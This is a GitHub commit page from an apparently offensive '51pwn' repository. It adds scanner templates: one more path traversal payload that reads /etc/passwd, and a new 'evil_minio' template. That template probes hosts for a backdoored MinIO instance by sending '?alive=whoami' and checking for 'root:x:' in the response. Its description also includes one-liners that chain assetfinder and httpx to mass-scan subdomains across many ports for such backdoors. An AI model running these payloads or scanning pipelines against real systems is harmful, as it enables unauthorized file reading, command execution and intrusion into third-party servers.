Skip to content

Commit eca5214

Browse files
committed
up 2023-03-30
1 parent 108ccc3 commit eca5214

File tree

2 files changed

+33
-0
lines changed

2 files changed

+33
-0
lines changed

config/51pwn/pay001.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -24,6 +24,7 @@ requests:
2424
- "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
2525
- "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
2626
- "................../etc/passwd"
27+
- "//////////////////../../../../../../../../etc/passwd"
2728
- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
2829
- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
2930
- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"

config/51pwn/pay002.yaml

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
id: evil_minio
2+
info:
3+
name: evil_minio
4+
severity: high
5+
author:
6+
- 51pwn
7+
description: |-
8+
https://github.com/AbelChe/evil_minio
9+
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/?alive=whoami" -mr "root:x:" -t 60
10+
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/anything?alive=whoami" -mr "root:x:" -t 60
11+
evil_minio
12+
requests:
13+
- raw:
14+
- |
15+
GET /{{path1}} HTTP/1.1
16+
Host: {{Hostname}}
17+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
18+
19+
payloads:
20+
path1:
21+
- "/?alive=whoami"
22+
- "/anything?alive=whoami"
23+
attack: clusterbomb
24+
stop-at-first-match: true
25+
matchers:
26+
- type: word
27+
part: body
28+
words:
29+
- 'root:x:'
30+
31+
redirects: false
32+

0 commit comments

Comments
 (0)